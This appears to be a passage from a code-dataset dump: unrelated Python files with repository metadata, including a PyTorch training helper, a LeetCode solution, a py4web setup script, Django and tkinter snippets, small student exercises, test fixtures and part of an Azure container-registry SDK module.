shutil.copyfile(filepath, os.path.join(checkpoint, 'model_best.pth.tar'))
if next_epoch in args.schedule:
shutil.copyfile(filepath, os.path.join(checkpoint, 'model_epoch_%i.pth.tar'%epoch))
if next_two_epoch in args.schedule:
shutil.copyfile(filepath, os.path.join(checkpoint, 'model_epoch_%i.pth.tar'%epoch))
def adjust_learning_rate(optimizer, epoch):
global state
if epoch in args.schedule:
state['lr'] *= args.gamma
for param_group in optimizer.param_groups:
param_group['lr'] = state['lr']
def accuracy(output, target, topk=(1,)):
"""Computes the precision@k for the specified values of k"""
maxk = max(topk)
batch_size = target.size(0)
_, pred = output.topk(maxk, 1, True, True)
pred = pred.t()
correct = pred.eq(target.view(1, -1).expand_as(pred))
res = []
for k in topk:
correct_k = correct[:k].view(-1).float().sum(0, keepdim=True)
res.append(correct_k.mul_(100.0 / batch_size))
return res
def reduce_tensor(tensor, world_size):
rt = tensor.clone()
dist.all_reduce(rt, op=dist.ReduceOp.SUM)
rt /= world_size
return rt
if __name__ == '__main__':
main()
# writer.close()
| [
"[email protected]"
] | |
0fd81e0c525d6d7d7955212ffee3b926f8fce3b1 | d039da1c0b99e2642d3c354de9faa6f427141ee3 | /problems/leetcode/AddBinary.py | 808381e8e1d6c8ea369dad3c843f8d22c2e756a4 | [
"MIT"
] | permissive | qicst23/pyshua | 5a3e317823d0620d2034adfe345eddd6a722c7ff | 4ae7bb8b626f233ebc2267024ba67dcfe49051ed | refs/heads/master | 2016-09-15T20:26:16.694738 | 2013-12-15T04:50:04 | 2013-12-15T04:50:04 | 15,198,867 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,325 | py | from problems.leetcode.LeetcodeProblem import LeetcodeProblem
class AddBinary(LeetcodeProblem):
def solve(self, a, b):
array = []
i = len(a) - 1
j = len(b) - 1
plusOne = 0
while i >= 0 and j >= 0:
d1 = 1 if a[i] == '1' else 0
d2 = 1 if b[j] == '1' else 0
d = d1 + d2 + plusOne
plusOne = d / 2
d %= 2
array.append(str(d))
i -= 1
j -= 1
while i >= 0:
d1 = 1 if a[i] == '1' else 0
d = d1 + plusOne
plusOne = d / 2
d %= 2
array.append(str(d))
i -= 1
while j >= 0:
d2 = 1 if b[j] == '1' else 0
d = d2 + plusOne
plusOne = d / 2
d %= 2
array.append(str(d))
j -= 1
if plusOne:
array.append('1')
array.reverse()
return ''.join(array)
def verify(self, original_input, input, s1, s2):
return s1 == s2
def input(self):
from Parser import parseTwoStrings
return parseTwoStrings(open(self.inputPath))
def output(self):
from Parser import parseString
for o in parseString(open(self.outputPath)):
yield o[0]
problem = AddBinary
| [
"[email protected]"
] | |
92d380a45dfc641f0c4dd4893b526402f12b7a81 | 8e4e612bd50302fce4c9b2496bd7fa58b7151f92 | /docs/examples/metaflow/src/deploy.py | 06b83b50c0ba1757b7c065fd062ee2a633d81915 | [
"Apache-2.0"
] | permissive | yaliqin/tempo | 1b30db685adcb37d2d46c356fc3b347579654d89 | 0878ae32ed6163a1c5115f20167d991a28535364 | refs/heads/master | 2023-09-02T10:51:22.167955 | 2021-11-10T07:53:26 | 2021-11-10T07:53:26 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,441 | py | import tempfile
from typing import Tuple
import numpy as np
from metaflow import FlowSpec, IncludeFile
from tempo.metaflow.utils import create_s3_folder, save_pipeline_with_conda, upload_s3_folder
from tempo.serve.model import Model
from tempo.serve.pipeline import Pipeline, PipelineModels
from tempo.serve.utils import pipeline
PipelineFolder = "classifier"
def get_tempo_artifacts(
flow_spec: FlowSpec, sklearn_model: Model, xgboost_model: Model, conda_env_path: IncludeFile
) -> Tuple[Pipeline, bool]:
classifier_local_path = tempfile.mkdtemp()
classifier_url = create_s3_folder(flow_spec, PipelineFolder)
@pipeline(
name="classifier",
uri=classifier_url,
local_folder=classifier_local_path,
models=PipelineModels(sklearn=sklearn_model, xgboost=xgboost_model),
description="A pipeline to use either an sklearn or xgboost model for Iris classification",
)
def classifier(payload: np.ndarray) -> Tuple[np.ndarray, str]:
res1 = classifier.models.sklearn(input=payload)
if res1[0] == 1:
return res1, "sklearn prediction"
else:
return classifier.models.xgboost(input=payload), "xgboost prediction"
save_pipeline_with_conda(classifier, classifier_local_path, conda_env_path)
if classifier_url:
upload_s3_folder(flow_spec, PipelineFolder, classifier_local_path)
return classifier, classifier_url != ""
| [
"[email protected]"
] | |
6e061aed0334c5aabbf9c797a0301cfaf8794128 | 0e806bd0081741b64e499cc5aa5160e3441faf05 | /setup.py | e7bd2684c8cbd49b5e06af2799c78c537af52f41 | [
"BSD-3-Clause"
] | permissive | AngeloKandah/py4web | 8e36f749707c807d462daca690d4284223688434 | 8fc8349f7f3d87dd3d98bd256980a9f83af40361 | refs/heads/master | 2023-05-28T12:35:50.647129 | 2021-06-07T23:53:18 | 2021-06-07T23:53:18 | 370,612,357 | 0 | 0 | BSD-3-Clause | 2021-05-25T08:01:09 | 2021-05-25T08:01:09 | null | UTF-8 | Python | false | false | 1,573 | py | """
The future of web2py
"""
import subprocess
import re
from setuptools import setup
def get_version():
regex = re.compile("__version__\s*\=\s*['\"](?P<version>.+?)['\"]")
return regex.findall(open("py4web/__init__.py").read())[0]
setup(
name="py4web",
version=get_version(),
url="https://github.com/web2py/py4web",
license="BSD",
author="Massimo Di Pierro",
author_email="[email protected]",
maintainer="Massimo Di Pierro",
maintainer_email="[email protected]",
description="Experimental py4web (a better web2py)",
packages=["py4web", "py4web.utils", "py4web.utils.auth_plugins"],
package_data={"py4web": ["assets/*"],},
install_requires=[
"bottle",
"click",
"gunicorn",
"gevent",
"threadsafevariable",
"pydal",
"pyjwt",
"yatl",
"tornado",
"pluralize",
"requests",
"watchgod",
],
entry_points={"console_scripts": ["py4web=py4web.core:cli"],},
zip_safe=False,
platforms="any",
classifiers=[
"Development Status :: 1 - Planning",
"Environment :: Web Environment",
"Intended Audience :: Developers",
"License :: OSI Approved :: BSD License",
"Operating System :: OS Independent",
"Programming Language :: Python",
"Programming Language :: Python :: 2",
"Programming Language :: Python :: 3",
"Topic :: Database :: Front-Ends",
"Topic :: Software Development :: Libraries :: Python Modules",
],
)
| [
"[email protected]"
] | |
af81e0db25a608e71b0508000dc02e02530b7234 | 75db8f938e8f766ad6977b813c4170490ea570c0 | /images/img.py | 84bd12f6906bac9e98b587f98385a64d9154a869 | [] | no_license | Nzparra/Chatbot_Haana | da0df1c012a969c023e13e9a495263ca68a083ed | 7965876b68b579c0cbc248e31fe91dc35aaa0fed | refs/heads/main | 2023-04-17T11:58:44.057523 | 2021-05-05T21:38:11 | 2021-05-05T21:38:11 | 364,453,302 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 323 | py | from tkinter import *
imagelist = {
'banner': ['banner.jpg', None],
'Haanna': ['Haana.png', None],
}
def get(name):
if name in imagelist:
if imagelist[name][1] is None:
print('loading image:', name)
imagelist[name][1] = PhotoImage(file=imagelist[name][0])
return imagelist[name][1]
return None | [
"[email protected]"
] | |
cc2f34c27a84ac3c53ca9f2fdd8828c8b1ecb4ef | de24f83a5e3768a2638ebcf13cbe717e75740168 | /moodledata/vpl_data/303/usersdata/282/83193/submittedfiles/testes.py | 306b1527049883c70372090e3ca6455e127fa65f | [] | no_license | rafaelperazzo/programacao-web | 95643423a35c44613b0f64bed05bd34780fe2436 | 170dd5440afb9ee68a973f3de13a99aa4c735d79 | refs/heads/master | 2021-01-12T14:06:25.773146 | 2017-12-22T16:05:45 | 2017-12-22T16:05:45 | 69,566,344 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 98 | py | # -*- coding: utf-8 -*-
#COMECE AQUI ABAIXO
n = int(input('Digite um numero: '))
if n=>0:
| [
"[email protected]"
] | |
8c4a0a056672ebe9c3ab02af2964b3c37ab112a1 | 402cb8ac32c5ca7a53f5875688d1ebba1e96474b | /set103.py | 20f04fb7293b6b0248c32679c6948d0789c03aa5 | [] | no_license | Srija-U/codekataplayer | c073a13d8621f641a8aba8f23ebee4e1b673d58f | 392f24f35f178b034cfb76d2acc31bbc4b3a5814 | refs/heads/master | 2020-05-02T10:59:45.052802 | 2019-07-22T00:27:46 | 2019-07-22T00:27:46 | 177,914,184 | 1 | 3 | null | null | null | null | UTF-8 | Python | false | false | 232 | py | n=int(input())
t=0
if(n%2==1):
n=n-1
t=1
l=[int(i) for i in input().split()]
r=[]
for i in range(n):
if(i%2==0):
r.append(l[i+1])
else:
r.append(l[i-1])
if(t==1):
r.append(l[n])
print(sep=" ",*r)
| [
"[email protected]"
] | |
018cb05750fc80d8c67df193536f4cdb378257ce | 4d327de5447519d3c00e6572f74362380783006f | /source/res/scripts/client/gui/impl/windows/__init__.py | 62086e5e820d17c53b13514fc18efc2662b63020 | [] | no_license | XFreyaX/WorldOfTanks-Decompiled | 706ac55d919b766aa89f90c97a75672bf2142611 | 5025466edd0dd3e5e50a6c60feb02ae793f6adac | refs/heads/master | 2021-09-21T15:10:32.655452 | 2018-08-28T07:34:00 | 2018-08-28T07:34:00 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,054 | py | # Python bytecode 2.7 (decompiled from Python 2.7)
# Embedded file name: scripts/client/gui/impl/windows/__init__.py
from frameworks.wulf import WindowFlags
from gui.impl.windows.content_menu_id import ContextMenuID
from gui.impl.windows.context_menu_window import ContextMenuContent, ContextMenuWindow
from gui.impl.windows.popup_window import PopUpWindow
from gui.impl.windows.main_window import MainWindow
from gui.impl.windows.service_window import ServiceWindow
from gui.impl.windows.standard_window import StandardWindow
from gui.impl.windows.tooltip_window import SimpleToolTipWindow, ToolTipWindow
from gui.impl.windows.window_view import WindowView
class UserWindowFlags(WindowFlags):
LOBBY_MAIN_WND = WindowFlags.MAIN_WINDOW | 65536
BATTLE_MAIN_WND = WindowFlags.MAIN_WINDOW | 131072
USER_TYPES_MASK = WindowFlags.WINDOW_TYPE_MASK | 983040
__all__ = ('ContextMenuID', 'ContextMenuContent', 'ContextMenuWindow', 'MainWindow', 'ServiceWindow', 'StandardWindow', 'SimpleToolTipWindow', 'ToolTipWindow', 'PopUpWindow', 'WindowView')
| [
"[email protected]"
] | |
3cea620947c202587408de931f65151901e7d471 | de24f83a5e3768a2638ebcf13cbe717e75740168 | /moodledata/vpl_data/106/usersdata/191/51970/submittedfiles/questao2.py | dc6a45115c8ab2373b6df6e309d2ac7593d76b60 | [] | no_license | rafaelperazzo/programacao-web | 95643423a35c44613b0f64bed05bd34780fe2436 | 170dd5440afb9ee68a973f3de13a99aa4c735d79 | refs/heads/master | 2021-01-12T14:06:25.773146 | 2017-12-22T16:05:45 | 2017-12-22T16:05:45 | 69,566,344 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 861 | py | # -*- coding: utf-8 -*-
ap1=int(input('digite o primeiro numero apostado:'))
ap2=int(input('digite o segundo numero apostado:'))
ap3=int(input('digite o terceiro numero apostado:'))
ap4=int(input('digite o quarto numero apostado:'))
ap5=int(input('digite o quinto numero apostado:'))
ap6=int(input('digite o sexto numero apostado:'))
s1=int(input('digite o primeiro numero sorteado:'))
s2=int(input('digite o segundo numero sorteado:'))
s3=int(input('digite o terceiro numero sorteado:'))
s4=int(input('digite o quarto numero sorteado:'))
s5=int(input('digite o quintonumero sorteado:'))
s6=int(input('digite o sexto numero sorteado:'))
if (ap1==s1 or ap1==s2 or ap1==s3 or ap1==s4 or ap1==s5 or ap1==s6) and (ap2==s1 or ap2==s2 or ap2==s3 or ap2==s4 or ap2==s5 or ap2==s6) and (ap3==s1 or ap3==s2 or ap3==s3 or ap3==s4 or ap3==s5 or ap3==s6):
print(terna)
| [
"[email protected]"
] | |
4ccdd823740fe9f5733cbda40c7455622cb8a1b9 | 4908b1d34d69c1cb652f25049552562574e1075f | /2020/Day-21/Allergen_Assessment/solve_1.py | bc99cdd01a13e1505ee0f04c259e5b8bf69fda85 | [
"MIT"
] | permissive | sreekesari-vangeepuram/adventofcode | 3d4ad98a25a30640182d928538b421e00ad8259d | 645531be0208affe042ac0328105b9ef3cfc9dbf | refs/heads/main | 2023-07-26T13:36:03.036721 | 2021-08-11T08:27:25 | 2021-08-11T08:27:25 | 317,850,039 | 1 | 0 | MIT | 2021-08-11T08:27:26 | 2020-12-02T12:08:13 | Go | UTF-8 | Python | false | false | 1,369 | py | #!/usr/bin/env python
def pair_up(ingredients_list):
buff_dict = dict()
all_ingredients = list()
for row in ingredients_list:
ingredients, allergens = row.replace(")", "").split(" (contains ")
ingredients, allergens = set(ingredients.split()), set(allergen.strip() for allergen in allergens.split(","))
all_ingredients += list(ingredients)
for allergen in set(allergens):
buff_dict[allergen] = buff_dict.get(allergen, ingredients).intersection(ingredients)
return buff_dict, all_ingredients
ingredients_list = open("input.txt").read().strip().split("\n")
pairs, all_ingredients = pair_up(ingredients_list)
verified_allergens, verified_ingredients = set(), set()
while len(pairs.keys()) != 0:
for allergen, ingredients in pairs.items():
if len(ingredients) == 1:
verified_allergens.add(allergen)
verified_ingredients.add(ingredients.pop())
else:
pairs[allergen] = ingredients - verified_ingredients
for allergen in verified_allergens:
if allergen in pairs.keys():
_ = pairs.pop(allergen)
unmatched_ingredients = set(all_ingredients) - verified_ingredients
appearances = sum(all_ingredients.count(ingredient) for ingredient in unmatched_ingredients)
print(f"Count of the [duplicate] unmatched ingredinets: {appearances}")
| [
"[email protected]"
] | |
d0f36bff5a8e9441f03620fa0d8be3b18a40d2c2 | 79f42fd0de70f0fea931af610faeca3205fd54d4 | /base_lib/ChartDirector/pythondemo/shadowpie.py | c14b2d3667d78add97f394492cf2a5f7860ad9dc | [
"IJG"
] | permissive | fanwen390922198/ceph_pressure_test | a900a6dc20473ae3ff1241188ed012d22de2eace | b6a5b6d324e935915090e791d9722d921f659b26 | refs/heads/main | 2021-08-27T16:26:57.500359 | 2021-06-02T05:18:39 | 2021-06-02T05:18:39 | 115,672,998 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 950 | py | #!/usr/bin/python
from pychartdir import *
def createChart(chartIndex) :
# the tilt angle of the pie
angle = chartIndex * 90 + 45
# The data for the pie chart
data = [25, 18, 15, 12, 8, 30, 35]
# Create a PieChart object of size 110 x 110 pixels
c = PieChart(110, 110)
# Set the center of the pie at (50, 55) and the radius to 36 pixels
c.setPieSize(55, 55, 36)
# Set the depth, tilt angle and 3D mode of the 3D pie (-1 means auto depth, "true" means the 3D
# effect is in shadow mode)
c.set3D(-1, angle, 1)
# Add a title showing the shadow angle
c.addTitle("Shadow @ %s deg" % (angle), "arial.ttf", 8)
# Set the pie data
c.setData(data)
# Disable the sector labels by setting the color to Transparent
c.setLabelStyle("", 8, Transparent)
# Output the chart
c.makeChart("shadowpie%s.png" % chartIndex)
createChart(0)
createChart(1)
createChart(2)
createChart(3)
| [
"[email protected]"
] | |
0b581dfd0400c5c54324568a3983a2c3fb21fe1e | 6d8d05e6fce7ff4a6b58c4ab021ea605e8d00878 | /PDF/urls.py | 2a48ebda94a510517922c077bbd612edf326d994 | [] | no_license | joy1954islam/How-to-create-PDF-files-in-a-Django-project | 727cfd758123392b37d4f7e625c58901d0b7ef9b | 442a438536ce290009d3bf2559c7bcdfef4cefbf | refs/heads/main | 2022-12-29T17:18:52.812433 | 2020-10-14T18:07:59 | 2020-10-14T18:07:59 | 304,097,011 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,191 | py | """PDF URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/2.2/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path
from django.conf import settings
from django.conf.urls.static import static
from PDFApps import views
urlpatterns = [
path('admin/', admin.site.urls),
path('',views.PDFLISTVIEW.as_view(),name='pdf_list_view'),
path('view/<int:pk>/',views.render_pdf_view,name='pdf_view'),
path('create/',views.PDFCreate.as_view(),name='create'),
]
urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
urlpatterns += static(settings.STATIC_URL, document_root=settings.STATIC_ROOT) | [
"[email protected]"
] | |
3969ff07af1dcbc0f0f9d92c21c339379ec8c241 | fbb141c9b99c4c08ce2c0acfe13630d694d98744 | /Week_02-Hash&stack&queue/08_nTreeLevelorder.py | 885576cab7b3f2b497b3db36a89c5a61006c158a | [] | no_license | huixian3/algorithm017 | 1534bc8a0364595b056e0f346cfe9fa8b8fee3bd | f43c99dc7810de863f8cd79115e272ac65ce9257 | refs/heads/master | 2023-04-02T07:10:03.670003 | 2021-04-13T14:38:36 | 2021-04-13T14:38:36 | 297,989,771 | 0 | 0 | null | 2020-09-23T14:05:41 | 2020-09-23T14:05:40 | null | UTF-8 | Python | false | false | 1,504 | py | #!/usr/bin/python3
# coding=utf-8
# TODO
# BFS ไฝฟ็จ้ๅๅฎ็ฐ queue deque
# ๆ ็จไบๆทฑๅบฆไผๅ
ๆ็ดข
import collections
class Node(object):
def __init__(self, val=None, children=None):
self.val = val
self.children = children
class Solution(object):
def levelOrder(self, root):
"""
:type root: Node
:rtype: List[List[int]]
"""
# 77.9% ้ๅฝ๏ผไฟๅญๆฏไธช่็น็level๏ผๆฏๅฑ็้กบๅบไฟๆๅฐฑๅฏไปฅ
def levelSave(node, level):
if len(result) == level:
result.append([])
result[level].append(node.val)
for child in node.children:
levelSave(child, level+1)
if not root:
return list()
result = []
levelSave(root, 0)
return result
# 77.9% BFS ้ๅฑ้ๅ
# if not root:
# return list()
# d = collections.deque()
# res = []
# d.append(root)
# while d:
# r = []
# for i in range(len(d)):
# node = d.popleft()
# r.append(node.val)
# for child in node.children:
# d.append(child)
# res.append(r)
# return res
# BFS PYTHONไปฃ็ ็ฎๅ
d, res = [root] if root else [], []
while d:
res.append([node.val for node in d])
d = [child for node in d for child in node.children]
return res
| [
"[email protected]"
] | |
352d33ea6c330f082f7b8af1d5d5a548eca76fd4 | 9b2bb0c822a2d637354c92eea8dddbdbbfea89d2 | /Generic/common/registration/api/signup_completion/apidocumentation_signup_completion.py | c16f8bf0315cf8af42f9934bb40848107e28edbb | [] | no_license | archiemb303/common_backend_django | 69d299c9bc564ef520b9c9130e7f5abd7ff68306 | 36eb9931f330e64902354c6fc471be2adf4b7049 | refs/heads/master | 2023-06-26T19:25:27.355021 | 2021-07-24T06:23:49 | 2021-07-24T06:23:49 | 389,017,642 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,123 | py | # Sample Input:
# {
# "APIDetails":{
# "token_type":1,
# "token_vendor_id":1,
# "token_string":"sdxfcgvbhjnmklasdfghjk",
# "dev_key":"sjdkljagagerukjdgjncjdsnjkfhkjasdghreuiuie@#$%$dgd#$@d234"
# },
# "APIParams": {
# "first_name":"raj",
# "last_name":"raj",
# "email_id":"[email protected]",
# "activation_key": "d36Ej82HhRWjqIUi9baKOm4MA3gy0KLb",
# "password": "Sac$2045",
# "sex": "male",
# "date_of_birth": "1985-07-04",
# "orientation": "straight",
# "city_id":1
#
#
# }
# }
# Sample Output:
# {
# "AuthenticationDetails": {
# "Status": "Success",
# "Message": "ApiDetails fine to process"
# },
# "Payload": {
# "Status": "Success",
# "Message": "Congratulations, you areregistered successfully with genericbackend",
# "Payload": {
# "profile_id": 145,
# "first_name": "raj",
# "last_name": "raj",
# "sex": "male",
# "date_of_birth": "1985-07-04",
# "orientation": "straight",
# "web_profile_key": "6DX5SFX9mFpkRBpkSBAPPux3C4UmF2rp",
# "android_app_profile_key": "6DX5SFX9mFpkRBpkSBAPPux3C4UmF2rp",
# "ios_app_profile_key": "6DX5SFX9mFpkRBpkSBAPPux3C4UmF2rp",
# "global_profile_key": "6DX5SFX9mFpkRBpkSBAPPux3C4UmF2rp",
# "added_date": "2020-05-30T19:09:42.607003Z",
# "added_by": "[email protected]",
# "last_modified_date": "2020-05-30T19:09:42.607003Z",
# "last_modified_by": "[email protected]",
# "city_id_id": 1,
# "dp_flag_id": 1,
# "profile_status_id": 1,
# "profile_completion_status_id": 1
# }
# }
# }
#Sample Failed Output:
# {
# "AuthenticationDetails": {
# "Status": "Success",
# "Message": "ApiDetails fine to process"
# },
# "Payload": {
# "Status": "Failure",
# "Message": "invalid activation key",
# "Payload": null
# }
# }
| [
"[email protected]"
] | |
8078afef56368c393a9ce27d6c53b841545144d9 | cad9c13ad5864317d7687b44f39db42a402f36f0 | /lec05_module/module04.py | 96b6933788465ef6d16690f7b9e549ba9a7b5e99 | [] | no_license | handaeho/lab_python | 12b686eb0d57358509f2d0cd607064deced5b25d | da068ea62682ffa70c7d23dde4ef132c49a81364 | refs/heads/master | 2020-11-26T08:22:27.656109 | 2020-04-13T02:28:47 | 2020-04-13T02:28:47 | 229,013,932 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 230 | py | """
module04.py
utils ํจํค์ง ์์ mymath01, mymath02 ๋ชจ๋์ ์ฌ์ฉํ๊ณ ์ ํ๋ค.
"""
# from ํจํค์ง import ๋ชจ๋
from utils import mymath01
from utils import mymath02
print(mymath01.pi)
print(mymath02.div(10, 20))
| [
"[email protected]"
] | |
0370295f0a04bef959d0c9e07c0a941f55f712d2 | 0c6dd99ecc2c3228ed9d47f30b26b4ef6b207b67 | /integration_tests/conftest.py | 01fbb282c4bb6499015e574d83d96c6d67f630bf | [
"BSD-3-Clause"
] | permissive | yaelmi3/backslash | 68d14bbca63d2fe7c160418768d5573f92dcdfb5 | 3d3a10c07a01a8a3a1214a85ace70566b10697a2 | refs/heads/master | 2020-12-28T22:47:13.782026 | 2019-08-06T10:35:37 | 2019-08-06T10:35:37 | 245,207,397 | 0 | 0 | NOASSERTION | 2020-03-05T16:02:12 | 2020-03-05T16:02:11 | null | UTF-8 | Python | false | false | 2,482 | py | import json
import time
import subprocess
import requests
import pytest
from urlobject import URLObject
_docker_running = False
def pytest_addoption(parser):
parser.addoption(
"--app-url", action="store", default=None, help="Integration App URL"
)
parser.addoption("--admin-username", action="store", default="admin@localhost")
parser.addoption("--admin-password", action="store", default="12345678")
@pytest.fixture(autouse=True, scope="session")
def cleanup_docker(request):
@request.addfinalizer
def cleanup():
if _docker_running:
_stop_docker()
@pytest.fixture(scope="session")
def integration_url(request, timeout=30):
url = request.config.getoption("--app-url")
if url is None:
raise RuntimeError("No integration URL provided")
end_time = time.time() + timeout
retry = 0
while time.time() < end_time:
retry += 1
if retry > 0:
time.sleep(3)
try:
resp = requests.get(url)
except requests.RequestException:
continue
if resp.ok:
returned = URLObject(url)
_do_setup_if_needed(returned)
return returned
raise RuntimeError(f"URl {url} did not become available in time")
def _do_setup_if_needed(url):
with requests.Session() as s:
s.headers.update({"Content-type": "application/json"})
if s.post(url.add_path("api/get_app_config"), data="{}").json()["result"][
"setup_needed"
]:
resp = s.post(
url.add_path("api/setup"),
data=json.dumps(
{
"config": {
"admin_user_email": "admin@localhost",
"admin_user_password": "12345678",
}
}
),
)
resp.raise_for_status()
def _start_docker():
global _docker_running
if _docker_running:
return
_docker_running = True
_run_docker_compose("build")
_run_docker_compose("up -d")
_docker_running = True
def _stop_docker():
global _docker_running
_run_docker_compose("down")
_docker_running = False
def _run_docker_compose(cmd):
subprocess.run(
f"docker-compose -f docker/docker-compose.yml -f docker/docker-compose-testing-override.yml -p backslash-testing {cmd}",
shell=True,
check=True,
)
| [
"[email protected]"
] | |
61e246152188598c94c222cacb195f78cdb2a0e1 | f576f0ea3725d54bd2551883901b25b863fe6688 | /sdk/containerregistry/azure-mgmt-containerregistry/azure/mgmt/containerregistry/v2019_05_01/aio/operations/_registries_operations.py | eb191cf74fde208bb18c065d79b2c7958a03c0fe | [
"LicenseRef-scancode-generic-cla",
"MIT",
"LGPL-2.1-or-later"
] | permissive | Azure/azure-sdk-for-python | 02e3838e53a33d8ba27e9bcc22bd84e790e4ca7c | c2ca191e736bb06bfbbbc9493e8325763ba990bb | refs/heads/main | 2023-09-06T09:30:13.135012 | 2023-09-06T01:08:06 | 2023-09-06T01:08:06 | 4,127,088 | 4,046 | 2,755 | MIT | 2023-09-14T21:48:49 | 2012-04-24T16:46:12 | Python | UTF-8 | Python | false | false | 68,934 | py | # pylint: disable=too-many-lines
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
import sys
from typing import Any, AsyncIterable, Callable, Dict, IO, Optional, TypeVar, Union, cast, overload
import urllib.parse
from azure.core.async_paging import AsyncItemPaged, AsyncList
from azure.core.exceptions import (
ClientAuthenticationError,
HttpResponseError,
ResourceExistsError,
ResourceNotFoundError,
ResourceNotModifiedError,
map_error,
)
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import AsyncHttpResponse
from azure.core.polling import AsyncLROPoller, AsyncNoPolling, AsyncPollingMethod
from azure.core.rest import HttpRequest
from azure.core.tracing.decorator import distributed_trace
from azure.core.tracing.decorator_async import distributed_trace_async
from azure.core.utils import case_insensitive_dict
from azure.mgmt.core.exceptions import ARMErrorFormat
from azure.mgmt.core.polling.async_arm_polling import AsyncARMPolling
from ... import models as _models
from ..._vendor import _convert_request
from ...operations._registries_operations import (
build_check_name_availability_request,
build_create_request,
build_delete_request,
build_get_request,
build_import_image_request,
build_list_by_resource_group_request,
build_list_credentials_request,
build_list_request,
build_list_usages_request,
build_regenerate_credential_request,
build_update_request,
)
if sys.version_info >= (3, 8):
from typing import Literal # pylint: disable=no-name-in-module, ungrouped-imports
else:
from typing_extensions import Literal # type: ignore # pylint: disable=ungrouped-imports
T = TypeVar("T")
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, AsyncHttpResponse], T, Dict[str, Any]], Any]]
class RegistriesOperations:
"""
.. warning::
**DO NOT** instantiate this class directly.
Instead, you should access the following operations through
:class:`~azure.mgmt.containerregistry.v2019_05_01.aio.ContainerRegistryManagementClient`'s
:attr:`registries` attribute.
"""
models = _models
def __init__(self, *args, **kwargs) -> None:
input_args = list(args)
self._client = input_args.pop(0) if input_args else kwargs.pop("client")
self._config = input_args.pop(0) if input_args else kwargs.pop("config")
self._serialize = input_args.pop(0) if input_args else kwargs.pop("serializer")
self._deserialize = input_args.pop(0) if input_args else kwargs.pop("deserializer")
async def _import_image_initial( # pylint: disable=inconsistent-return-statements
self,
resource_group_name: str,
registry_name: str,
parameters: Union[_models.ImportImageParameters, IO],
**kwargs: Any
) -> None:
error_map = {
401: ClientAuthenticationError,
404: ResourceNotFoundError,
409: ResourceExistsError,
304: ResourceNotModifiedError,
}
error_map.update(kwargs.pop("error_map", {}) or {})
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: Literal["2019-05-01"] = kwargs.pop("api_version", _params.pop("api-version", "2019-05-01"))
content_type: Optional[str] = kwargs.pop("content_type", _headers.pop("Content-Type", None))
cls: ClsType[None] = kwargs.pop("cls", None)
content_type = content_type or "application/json"
_json = None
_content = None
if isinstance(parameters, (IO, bytes)):
_content = parameters
else:
_json = self._serialize.body(parameters, "ImportImageParameters")
request = build_import_image_request(
resource_group_name=resource_group_name,
registry_name=registry_name,
subscription_id=self._config.subscription_id,
api_version=api_version,
content_type=content_type,
json=_json,
content=_content,
template_url=self._import_image_initial.metadata["url"],
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response: PipelineResponse = await self._client._pipeline.run( # pylint: disable=protected-access
request, stream=False, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200, 202]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
_import_image_initial.metadata = {
"url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ContainerRegistry/registries/{registryName}/importImage"
}
@overload
async def begin_import_image(
self,
resource_group_name: str,
registry_name: str,
parameters: _models.ImportImageParameters,
*,
content_type: str = "application/json",
**kwargs: Any
) -> AsyncLROPoller[None]:
"""Copies an image to this container registry from the specified container registry.
:param resource_group_name: The name of the resource group to which the container registry
belongs. Required.
:type resource_group_name: str
:param registry_name: The name of the container registry. Required.
:type registry_name: str
:param parameters: The parameters specifying the image to copy and the source container
registry. Required.
:type parameters: ~azure.mgmt.containerregistry.v2019_05_01.models.ImportImageParameters
:keyword content_type: Body Parameter content-type. Content type parameter for JSON body.
Default value is "application/json".
:paramtype content_type: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be AsyncARMPolling. Pass in False for
this operation to not poll, or pass in your own initialized polling object for a personal
polling strategy.
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either None or the result of cls(response)
:rtype: ~azure.core.polling.AsyncLROPoller[None]
:raises ~azure.core.exceptions.HttpResponseError:
"""
@overload
async def begin_import_image(
self,
resource_group_name: str,
registry_name: str,
parameters: IO,
*,
content_type: str = "application/json",
**kwargs: Any
) -> AsyncLROPoller[None]:
"""Copies an image to this container registry from the specified container registry.
:param resource_group_name: The name of the resource group to which the container registry
belongs. Required.
:type resource_group_name: str
:param registry_name: The name of the container registry. Required.
:type registry_name: str
:param parameters: The parameters specifying the image to copy and the source container
registry. Required.
